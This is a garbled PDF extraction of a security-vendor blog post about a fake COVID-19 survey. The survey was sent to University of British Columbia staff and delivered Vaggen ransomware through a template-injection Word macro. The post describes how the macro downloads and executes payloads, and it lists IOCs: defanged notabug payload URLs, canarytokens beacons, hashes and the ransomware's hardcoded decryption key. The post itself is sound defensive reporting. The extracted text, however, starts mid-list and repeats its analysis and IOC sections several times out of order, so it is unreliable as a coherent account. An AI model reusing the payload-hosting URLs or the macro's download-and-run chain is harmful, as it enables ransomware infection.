3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1958 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1959 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1960 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1961 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1962 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1963 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1964 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1965 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1966 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1967 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1968 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1969 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1970 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1971 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1972 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1973 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1974 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1975 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1976 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1977 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1978 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1979 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1980 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1981 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1982 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1983 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1984 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1985 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1986 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1987 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1988 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1989 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1990 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1991 of 